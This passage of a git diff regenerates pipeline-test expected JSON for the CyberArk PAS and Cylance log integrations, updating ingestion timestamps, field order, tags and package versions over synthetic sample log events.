{\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-BusinessWebsite.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json index b23043495f1..59ed8851083 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267387900Z", + "ingested": "2021-12-14T14:42:45.379284146Z", "original": "\u003c5\u003e1 2021-03-04T17:27:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:14\",\"IsoTimestamp\":\"2021-03-04T17:27:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267396800Z", + "ingested": "2021-12-14T14:42:45.379286410Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:15.267402800Z", + "ingested": "2021-12-14T14:42:45.379286963Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -241,7 +241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267408600Z", + "ingested": "2021-12-14T14:42:45.379287380Z", "original": "\u003c5\u003e1 2021-03-04T17:27:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:33\",\"IsoTimestamp\":\"2021-03-04T17:27:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index 77ca5219bda..ba7660f6443 100644 --- a/packages/cyberarkpas/manifest.yml 
+++ b/packages/cyberarkpas/manifest.yml @@ -1,6 +1,6 @@ name: cyberarkpas title: CyberArk Privileged Access Security Logs -version: 2.2.1 +version: 2.2.2 release: ga description: Collect audit logs from Cyberark Vault servers with Elastic Agent. type: integration diff --git a/packages/cylance/changelog.yml b/packages/cylance/changelog.yml index 2d6c6cbce22..b9d7afb368a 100644 --- a/packages/cylance/changelog.yml +++ b/packages/cylance/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json b/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json index deb38a2fe6f..37e9d766e8e 100644 --- a/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "29-January-2016 06:09:59 high boNemoe4402.www.invalid dolore \u003c\u003csequa\u003eabo 2016-1-29T6:09:59.squira nostrud4819.mail.test CylancePROTECT mqui nci [billoi] Event Type: AuditLog, Event Name: ZoneAdd, Message: Policy Assigned:orev; Devices: pisciv , User: uii umexe (estlabo)", "event": { - "ingested": "2021-06-09T10:27:47.525582200Z" + "ingested": "2021-12-14T14:42:47.135044984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-2-12T1:12:33.olupt volup208.invalid CylancePROTECT eosquir orsi [nulapari] Event Type: AuditLog, Event Name: LoginSuccess, Message: Devices: vol, User: luptat isiutal (moenimi)", "event": { - "ingested": "2021-06-09T10:27:47.525605100Z" + "ingested": "2021-12-14T14:42:47.135048045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "26-Feb-2016 8:15:08 very-high anonnu410.internal.home aqu \u003c\u003cutper\u003esquame 26T20:15:08.ntex eius6159.www5.localhost CylancePROTECT Event Name:Alert, Device Message: Device: aer User: ),lupt (tia oloremqu Zone Names: temvel Device Id: iatu", "event": { - "ingested": "2021-06-09T10:27:47.525612400Z" + "ingested": "2021-12-14T14:42:47.135048982Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-3-12T3:17:42.ceroinBC ratvolup497.www.corp CylancePROTECT ionofde con [uia] Event Type: AuditLog, Event Name: SystemSecurity, Message: ommodic, User: mipsu consec (taliquip)", "event": { - "ingested": "2021-06-09T10:27:47.525625400Z" + "ingested": "2021-12-14T14:42:47.135049431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-3-26T10:20:16.gelit tatno5625.api.local 
CylancePROTECT taev roidents [oluptas] Event Type: AuditLog, Event Name: Alert, Message: Source: taliqu; SHA256: ommod; Reason: failure, User: tur aperi (iveli)", "event": { - "ingested": "2021-06-09T10:27:47.525631300Z" + "ingested": "2021-12-14T14:42:47.135049821Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatDuis 2016-4-9T5:22:51.ude maveniam1399.mail.lan CylancePROTECT siutaliq exercit [tempor] Event Type: omnis, Event Name: SystemSecurity, Device Name: eip, Agent Version: lupta, IP Address: (10.124.61.119), MAC Address: (01:00:5e:dc:bb:8b), Logged On Users: (occ), OS: ect Zone Names: reetdolo", "event": { - "ingested": "2021-06-09T10:27:47.525636600Z" + "ingested": "2021-12-14T14:42:47.135050202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "24-Apr-2016 12:25:25 low lor340.mail.local natura \u003c\u003caboris\u003eima 24T00:25:25.tanimi nimadmin6499.local CylancePROTECT Event Name:Device Policy Assigned, Device Message: Device: dexe User: ),urerep (aquaeab liqu Zone Names: lorem Device Id: emq", "event": { - "ingested": "2021-06-09T10:27:47.525642400Z" + "ingested": "2021-12-14T14:42:47.135050612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ari 2016-5-8T7:27:59.equun suntinc4934.www5.test CylancePROTECT ipis gelits [tatevel] Event Type: AuditLog, Event Name: ThreatUpdated, Message: Policy: uptatev; SHA256: uovol, User: )dmi (olab mquisnos", "event": { - "ingested": "2021-06-09T10:27:47.525648Z" + "ingested": "2021-12-14T14:42:47.135050996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "22-May-2016 14:30:33 medium tvol457.internal.local inim \u003c\u003cema\u003eroinBCSe 2016-5-22T2:30:33.onse 
tae1382.mail.localhost CylancePROTECT oluptate ofdeF tion Event Type: orsitame, Event Name: threat_quarantined, Threat Class: lit, Threat Subclass: iam, SHA256: qua, MD5: umdo", "event": { - "ingested": "2021-06-09T10:27:47.525653200Z" + "ingested": "2021-12-14T14:42:47.135051388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-6-5T9:33:08.eniam reetdolo2451.www.example CylancePROTECT rumet oll [erc] Event Type: ScriptControl, Event Name: SystemSecurity, Device Name: llam, File Path: aspern, Interpreter: itlabori, Interpreter Version: 1.2344, Zone Names: ollit, User Name: usan", "event": { - "ingested": "2021-06-09T10:27:47.525658100Z" + "ingested": "2021-12-14T14:42:47.135051768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olo 2016-6-20T4:35:42.uaera sitas4259.mail.corp CylancePROTECT atquovo iumto aboreetd Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Zone: dun; Policy: enim; Value: saute, User: vel quu (undeo)", "event": { - "ingested": "2021-06-09T10:27:47.525663800Z" + "ingested": "2021-12-14T14:42:47.135052151Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-7-4T11:38:16.isqu uis7612.www5.domain CylancePROTECT llumquid tation [ips] Event Type: emeumfug, Event Name: Registration, emporinc", "event": { - "ingested": "2021-06-09T10:27:47.525668600Z" + "ingested": "2021-12-14T14:42:47.135052725Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cup 2016-7-18T6:40:50.boNemoen uid7309.api.domain CylancePROTECT uradi aborumSe luptat Event Type: AuditLog, Event Name: SyslogSettingsSave, Message: Policy: antiumto, User: strude ctetura (usmod)", "event": { - "ingested": "2021-06-09T10:27:47.525673400Z" + 
"ingested": "2021-12-14T14:42:47.135053133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2-Aug-2016 1:43:25 high fugit7668.www5.invalid lupt \u003c\u003cxea\u003equa 2T01:43:25.luptatev admi3749.api.lan CylancePROTECT Event Name:DeviceRemove, Device Message: Device: tinvol; Zones Removed: dolore; Zones Added: abor, User: iqui etc (etM), Zone Names:nimadmin Device Id: ditautfu", "event": { - "ingested": "2021-06-09T10:27:47.525678200Z" + "ingested": "2021-12-14T14:42:47.135053539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-8-16T8:45:59.ostr rudexerc703.internal.host CylancePROTECT itaut imaven [liqua] Event Type: ScriptControl, Event Name: fullaccess, Device Name: onproide, File Path: Nemoen, Interpreter: tfug, Interpreter Version: 1.5383 (ccu), Zone Names: urE, User Name: isaute", "event": { - "ingested": "2021-06-09T10:27:47.525682900Z" + "ingested": "2021-12-14T14:42:47.135053936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eomnisis 2016-8-30T3:48:33.mqui civeli370.www5.local CylancePROTECT sunt stl tdolorem Event Type: AuditLog, Event Name: Alert, Message: The Device: picia was auto assigned to the Zone: IP Address: Fake Devices, User: mUtenima emaperi ()tame", "event": { - "ingested": "2021-06-09T10:27:47.525687400Z" + "ingested": "2021-12-14T14:42:47.135054323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/13 22:51:07 ivelits712.api.example CylancePROTECT Event Type: AppControl, etdolo inv [agnaali] Event Type: AppControl, Event Name: threat_found, Device Name: sequatur, IP Address: (10.199.98.186), Action: cancel, Action Type: nihi, File Path: Lor, SHA256: itecto, Zone Names: erc", 
"event": { - "ingested": "2021-06-09T10:27:47.525692Z" + "ingested": "2021-12-14T14:42:47.135054839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 2016-9-28T5:53:42.modoco estqu1709.internal.example CylancePROTECT ostrume molest [upt] Event Type: Threat, Event Name: LoginSuccess, Device Name: uasia, IP Address: (10.64.70.5), File Name: ici, Path: giatquov, Drive Type: eritquii, SHA256: dexeac, MD5: iscinge, Status: atvol, Cylance Score: 145.898000, Found Date: uames, File Type: tati, Is Running: utaliqu, Auto Run: oriosamn, Detected By: deFinibu, Zone Names: iadese, Is Malware: imidest, Is Unique To Cylance: emagnama, Threat Classification: eprehend", "event": { - "ingested": "2021-06-09T10:27:47.525696800Z" + "ingested": "2021-12-14T14:42:47.135055240Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-10-12T12:56:16.suntinc xeac7155.www.localdomain CylancePROTECT taliq intoccae [ents] Event Type: pida, Event Name: Alert, Device Name: idolor, Agent Version: emeumfu, IP Address: (10.143.239.210), MAC Address: (01:00:5e:93:1c:9f), Logged On Users: (oinBCSe), OS: mnisist Zone Names: sedd", "event": { - "ingested": "2021-06-09T10:27:47.525701500Z" + "ingested": "2021-12-14T14:42:47.135055647Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipitla 2016-10-26T7:58:50.quae maccusa5126.api.domain CylancePROTECT idex xerci [aqu] Event Type: ExploitAttempt, Event Name: Alert, Device Name: olorema, IP Address: (10.32.143.134), Action: accept, Process ID: 2289, Process Name: aliqu.exe, User Name: olupta, Violation Type: mipsumd, Zone Names: eFinib", "event": { - "ingested": "2021-06-09T10:27:47.525706600Z" + "ingested": "2021-12-14T14:42:47.135056039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10-Nov-2016 3:01:24 low eav3687.internal.local siar \u003c\u003corev\u003eiamquis 10T03:01:24.quirat llu4718.localhost CylancePROTECT Event Name:DeviceEdit, Device Name:conseq, External Device Type:oidentsu, External Device Vendor ID:atiset, External Device Name:atu, External Device Product ID:umexerci, External Device Serial Number:ern, Zone Names:psaquae", "event": { - "ingested": "2021-06-09T10:27:47.525711600Z" + "ingested": "2021-12-14T14:42:47.135056430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 24 10:03:59 doloremi7402.www.test CylancePROTECT Event Type:stquidol, Event Name:DeviceRemove, Device Message: Device: leumiu; Policy Changed: namali to 'taevit', User: rinrepre etconse (tincu), Zone Names:ari, Device Id: exercit", "event": { - "ingested": "2021-06-09T10:27:47.525716700Z" + "ingested": "2021-12-14T14:42:47.135056823Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "8-December-2016 17:06:33 very-high occae1180.internal.localhost aquaeabi \u003c\u003clita\u003eadeseru 2016-12-8T5:06:33.emoe eaq908.api.home CylancePROTECT itame intoc [oluptas] Event Type: tNequepo, Event Name: ZoneAddDevice, Device Name: luptasn, Zone Names:equat", "event": { - "ingested": "2021-06-09T10:27:47.525721500Z" + "ingested": "2021-12-14T14:42:47.135057217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ihilmole 2016-12-23T12:09:07.eriamea amre146.mail.host CylancePROTECT pisciv iquidex radipisc Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Policy: nti; SHA256: abi; Category: sectetur, User: )uioffi (oru temqu", "event": { - "ingested": "2021-06-09T10:27:47.525728Z" + "ingested": "2021-12-14T14:42:47.135057746Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ommodico 2017-1-6T7:11:41.quatD mcolab379.internal.home CylancePROTECT tsedqu agnid [proide] Event Type: ScriptControl, Event Name: DeviceRemove, Device Name: tper, File Path: olor, Interpreter: Neque, Interpreter Version: 1.4129 (xerc), Zone Names: iutali, User Name: fdeFi", "event": { - "ingested": "2021-06-09T10:27:47.525745700Z" + "ingested": "2021-12-14T14:42:47.135058137Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 20 2:14:16 tasuntex5037.www.corp CylancePROTECT Event Type:boN, Event Name:threat_quarantined, Device Name:ectio, Agent Version:dutper, IP Address: (10.237.205.140), MAC Address: (01:00:5e:3f:c4:6c), Logged On Users: (uames), OS:iduntu, Zone Names:veniam", "event": { - "ingested": "2021-06-09T10:27:47.525752300Z" + "ingested": "2021-12-14T14:42:47.135058523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-Feb-2017 9:16:50 very-high reme622.mail.example isnisiu \u003c\u003cbore\u003etsu 3T21:16:50.tcons sciun4694.api.lan CylancePROTECT Event Name:LoginSuccess, Device Message: Device: nsect User: ),idata (rumwritt magnid Zone Names: enderit Device Id: untex", "event": { - "ingested": "2021-06-09T10:27:47.525758200Z" + "ingested": "2021-12-14T14:42:47.135058902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "paquioff 2017-2-18T4:19:24.mquisnos maven3758.www.invalid CylancePROTECT labor didunt uptatema Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: udan, IP Address: (10.74.104.215), Action: cancel, Process ID: 7410, Process Name: mveleu.exe, User Name: nofdeFin, Violation Type: sequam, Zone Names: temvel", "event": { - "ingested": 
"2021-06-09T10:27:47.525764300Z" + "ingested": "2021-12-14T14:42:47.135059285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Mar-2017 11:21:59 medium tvolu3997.mail.home eiu \u003c\u003cntiumdo\u003eautfu 4T11:21:59.gnaaliq mni7200.mail.localdomain CylancePROTECT Event Name:pechange, Device Name:idolor, Zone Names:uisau, Device Id: eleum", "event": { - "ingested": "2021-06-09T10:27:47.525769700Z" + "ingested": "2021-12-14T14:42:47.135059676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Mar 18 6:24:33 ate4627.localdomain CylancePROTECT Event Type:officiad, Event Name:Device Policy Assigned, Message: The Device:quinescwas auto assigned to Zone:madmi, User:tur", "event": { - "ingested": "2021-06-09T10:27:47.525774700Z" + "ingested": "2021-12-14T14:42:47.135060066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2-April-2017 01:27:07 very-high orem6702.invalid tev \u003c\u003csaute\u003entocca 2017-4-2T1:27:07.ostru ntoccae1705.internal.invalid CylancePROTECT temquiav equatu [upta] Event Type: ScriptControl, Event Name: Alert, Device Name: sBon, File Path: orro, Interpreter: tae, Interpreter Version: 1.3212, Zone Names: tlab, User Name: aperiame", "event": { - "ingested": "2021-06-09T10:27:47.525779900Z" + "ingested": "2021-12-14T14:42:47.135060477Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "16-Apr-2017 8:29:41 high tobea2364.internal.localhost itinvol \u003c\u003ceavolup\u003efugiatn 16T08:29:41.docon etconsec6708.internal.invalid CylancePROTECT Event Name:PolicyAdd, Device Name:ersp, External Device Type:tquov, External Device Vendor ID:diconseq, External Device Name:inven, External Device Product ID:osquira, 
External Device Serial Number:tes, Zone Names:mquame", "event": { - "ingested": "2021-06-09T10:27:47.525784500Z" + "ingested": "2021-12-14T14:42:47.135060854Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-4-30T3:32:16.squirati Sedutp7428.internal.home CylancePROTECT utlabor itessequ [porro] Event Type: AuditLog, Event Name: PolicyAdd, Message: Zone: iquipe; Policy: itempor; Value: quin, User: upida tvolupt (eufugi)", "event": { - "ingested": "2021-06-09T10:27:47.525789400Z" + "ingested": "2021-12-14T14:42:47.135061239Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uamni 2017-5-14T10:34:50.ctet ati4639.www5.home CylancePROTECT archite loreme [untu] Event Type: AuditLog, Event Name: Alert, Message: Device: ven; User: con nisist (usmodte)", "event": { - "ingested": "2021-06-09T10:27:47.525796200Z" + "ingested": "2021-12-14T14:42:47.135061618Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-5-29T5:37:24.eturadi torever662.www5.home CylancePROTECT quam sumdolor [meaqueip] Event Type: AuditLog, Event Name: PolicyAdd, Message: The Device: pexe was auto assigned to the Zone: IP Address: 10.70.168.240, User: amcol adeser ()oin", "event": { - "ingested": "2021-06-09T10:27:47.525801300Z" + "ingested": "2021-12-14T14:42:47.135062127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-June-2017 12:39:58 medium meius3932.internal.example ccaeca \u003c\u003cumdolo\u003euptate 2017-6-12T12:39:58.amc cusant1701.api.localdomain CylancePROTECT siutaliq dutp psaquaea Event Type: taevita, Event Name: DeviceRemove, Device Name: siut, Agent Version: tconsect, IP Address: (10.190.175.158), MAC Address: (01:00:5e:45:8b:97), Logged On 
Users: (ditemp), OS: edqui", "event": { - "ingested": "2021-06-09T10:27:47.525806100Z" + "ingested": "2021-12-14T14:42:47.135062563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "26-June-2017 19:42:33 very-high rnatu2805.www.home enderi \u003c\u003cmquisno\u003eodoconse 2017-6-26T7:42:33.quamqua eacommod1930.internal.lan CylancePROTECT tpersp stla uptatema Event Type: AuditLog, Event Name: fullaccess, Message: Device: uradi; SHA256: tot; Category: llamco, User: )nea (psum tasnulap", "event": { - "ingested": "2021-06-09T10:27:47.525810800Z" + "ingested": "2021-12-14T14:42:47.135062943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-7-11T2:45:07.oremipsu emeumfug4387.internal.lan CylancePROTECT uidol litani [utodita] Event Type: AuditLog, Event Name: Alert, Message: Device: untincul; SHA256: iduntu, User: )ccaeca (niamq lapariat", "event": { - "ingested": "2021-06-09T10:27:47.525815500Z" + "ingested": "2021-12-14T14:42:47.135063324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uat 2017-7-25T9:47:41.tiaec rumwrit764.www5.local CylancePROTECT edquiac urerepr [eseru] Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: etMal, External Device Type: qua, External Device Vendor ID: rsita, External Device Name: ate, External Device Product ID: ipsamvo, External Device Serial Number: onula, Zone Names: miu", "event": { - "ingested": "2021-06-09T10:27:47.525819900Z" + "ingested": "2021-12-14T14:42:47.135063703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Aug 8 4:50:15 mex2054.mail.corp CylancePROTECT Event Type:luptat, Event Name:SyslogSettingsSave, Message: Provider:ica, Source IP:10.13.66.97, User: dicta 
taedicta (ritt)#015", "event": { - "ingested": "2021-06-09T10:27:47.525824700Z" + "ingested": "2021-12-14T14:42:47.135068522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-8-22T11:52:50.dictasun veniamqu7284.mail.invalid CylancePROTECT nte mvel nof Event Type: AuditLog, Event Name: DeviceEdit, Message: The Device: tetur was auto assigned to the Zone: IP Address: Fake Devices, User: ()xce", "event": { - "ingested": "2021-06-09T10:27:47.525829700Z" + "ingested": "2021-12-14T14:42:47.135069004Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "6-September-2017 06:55:24 high isiu5733.api.domain etdolor \u003c\u003clupta\u003exeaco 2017-9-6T6:55:24.nvolupt oremi1485.api.localhost CylancePROTECT iosa boNemoe [onsequ] Event Type: AuditLog, Event Name: threat_quarantined, Message: SHA256: amvolupt; Reason: success, User: atisund xea (ites)", "event": { - "ingested": "2021-06-09T10:27:47.525834600Z" + "ingested": "2021-12-14T14:42:47.135069457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eri 2017-9-20T1:57:58.quunt olori416.api.test CylancePROTECT elit cidunt plica Event Type: ExploitAttempt, Event Name: Alert, Device Name: exeaco, IP Address: (10.31.190.145), Action: cancel, Process ID: 5530, Process Name: accusant.exe, User Name: onse, Violation Type: admin, Zone Names: stenatu", "event": { - "ingested": "2021-06-09T10:27:47.525839500Z" + "ingested": "2021-12-14T14:42:47.135069850Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Oct-2017 9:00:32 high nvol6269.internal.local tla \u003c\u003citem\u003enimid 4T21:00:32.dat periam126.api.host CylancePROTECT Event Name:threat_found, Threat Class:rExc, Threat 
